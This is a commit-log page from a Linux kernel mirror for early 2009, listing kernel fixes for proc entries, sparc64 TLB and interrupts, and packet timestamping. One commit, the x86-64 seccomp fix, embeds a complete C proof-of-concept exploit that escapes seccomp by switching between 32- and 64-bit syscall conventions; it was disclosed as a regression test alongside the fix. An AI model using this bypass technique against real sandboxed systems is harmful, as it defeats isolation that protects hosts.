1. 15 4月, 2009 3 次提交
  2. 14 4月, 2009 1 次提交
  3. 08 4月, 2009 5 次提交
  4. 03 4月, 2009 3 次提交
  5. 01 4月, 2009 2 次提交
  6. 31 3月, 2009 1 次提交
    • A
      proc 2/2: remove struct proc_dir_entry::owner · 99b76233
      Alexey Dobriyan 提交于
      Setting ->owner as done currently (pde->owner = THIS_MODULE) is racy
      as correctly noted at bug #12454. Someone can lookup entry with NULL
      ->owner, thus not pinning enything, and release it later resulting
      in module refcount underflow.
      
      We can keep ->owner and supply it at registration time like ->proc_fops
      and ->data.
      
      But this leaves ->owner as easy-manipulative field (just one C assignment)
      and somebody will forget to unpin previous/pin current module when
      switching ->owner. ->proc_fops is declared as "const" which should give
      some thoughts.
      
      ->read_proc/->write_proc were just fixed to not require ->owner for
      protection.
      
      rmmod'ed directories will be empty and return "." and ".." -- no harm.
      And directories with tricky enough readdir and lookup shouldn't be modular.
      We definitely don't want such modular code.
      
      Removing ->owner will also make PDE smaller.
      
      So, let's nuke it.
      
      Kudos to Jeff Layton for reminding about this, let's say, oversight.
      
      http://bugzilla.kernel.org/show_bug.cgi?id=12454Signed-off-by: NAlexey Dobriyan <adobriyan@gmail.com>
      99b76233
  7. 30 3月, 2009 4 次提交
  8. 28 3月, 2009 1 次提交
  9. 27 3月, 2009 2 次提交
    • D
      sparc64: Fix MM refcount check in smp_flush_tlb_pending(). · f9384d41
      David S. Miller 提交于
      As explained by Benjamin Herrenschmidt:
      
      > CPU 0 is running the context, task->mm == task->active_mm == your
      > context. The CPU is in userspace happily churning things.
      >
      > CPU 1 used to run it, not anymore, it's now running fancyfsd which
      > is a kernel thread, but current->active_mm still points to that
      > same context.
      >
      > Because there's only one "real" user, mm_users is 1 (but mm_count is
      > elevated, it's just that the presence on CPU 1 as active_mm has no
      > effect on mm_count().
      >
      > At this point, fancyfsd decides to invalidate a mapping currently mapped
      > by that context, for example because a networked file has changed
      > remotely or something like that, using unmap_mapping_ranges().
      >
      > So CPU 1 goes into the zapping code, which eventually ends up calling
      > flush_tlb_pending(). Your test will succeed, as current->active_mm is
      > indeed the target mm for the flush, and mm_users is indeed 1. So you
      > will -not- send an IPI to the other CPU, and CPU 0 will continue happily
      > accessing the pages that should have been unmapped.
      
      To fix this problem, check ->mm instead of ->active_mm, and this
      means:
      
      > So if you test current->mm, you effectively account for mm_users == 1,
      > so the only way the mm can be active on another processor is as a lazy
      > mm for a kernel thread. So your test should work properly as long
      > as you don't have a HW that will do speculative TLB reloads into the
      > TLB on that other CPU (and even if you do, you flush-on-switch-in should
      > get rid of any crap here).
      
      And therefore we should be OK.
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      f9384d41
    • D
      sparc64: Fix build of timer_interrupt(). · e2ab3dff
      David Miller 提交于
      arch/sparc/kernel/time_64.c: In function ‘timer_interrupt’:
        arch/sparc/kernel/time_64.c:732: error: ‘struct kernel_stat’ has no member named ‘irqs’
        make[1]: *** [arch/sparc/kernel/time_64.o] Error 1
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      e2ab3dff
  10. 26 3月, 2009 1 次提交
  11. 19 3月, 2009 3 次提交
  12. 16 3月, 2009 10 次提交
  13. 05 3月, 2009 1 次提交
    • D
      sparc64: Fix lost interrupts on sun4u. · d0cac39e
      David S. Miller 提交于
      Based upon a report by Meelis Roos.
      
      Sparc64 SBUS and PCI controllers use a combination of IMAP and ICLR
      registers to manage device interrupts.
      
      The IMAP register contains the "valid" enable bit as well as CPU
      targetting information.  Whereas the ICLR register is written with
      zero at the end of handling an interrupt to reset the state machine
      for that interrupt to IDLE so it can be sent again.
      
      For PCI slot and SBUS slot devices we can have multiple interrupts
      sharing the same IMAP register.  There are individual ICLR registers
      but only one IMAP register for managing those.
      
      We represent each shared case with individual virtual IRQs so the
      generic IRQ layer thinks there is only one user of the IRQ instance.
      
      In such shared IMAP cases this is wrong, so if there are multiple
      active users then a free_irq() call will prematurely turn off the
      interrupt by clearing the Valid bit in the IMAP register even though
      there are other active users.
      
      Fix this by simply doing nothing in sun4u_disable_irq() and checking
      IRQF_DISABLED during IRQ dispatch.
      
      This situation doesn't exist in the hypervisor sun4v cases, so I left
      those alone.
      Tested-by: NMeelis Roos <mroos@linux.ee>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      d0cac39e
  14. 03 3月, 2009 1 次提交
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  15. 16 2月, 2009 1 次提交
    • P
      net: new user space API for time stamping of incoming and outgoing packets · cb9eff09
      Patrick Ohly 提交于
      User space can request hardware and/or software time stamping.
      Reporting of the result(s) via a new control message is enabled
      separately for each field in the message because some of the
      fields may require additional computation and thus cause overhead.
      User space can tell the different kinds of time stamps apart
      and choose what suits its needs.
      
      When a TX timestamp operation is requested, the TX skb will be cloned
      and the clone will be time stamped (in hardware or software) and added
      to the socket error queue of the skb, if the skb has a socket
      associated with it.
      
      The actual TX timestamp will reach userspace as a RX timestamp on the
      cloned packet. If timestamping is requested and no timestamping is
      done in the device driver (potentially this may use hardware
      timestamping), it will be done in software after the device's
      start_hard_xmit routine.
      Signed-off-by: NPatrick Ohly <patrick.ohly@intel.com>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      cb9eff09
  16. 11 2月, 2009 1 次提交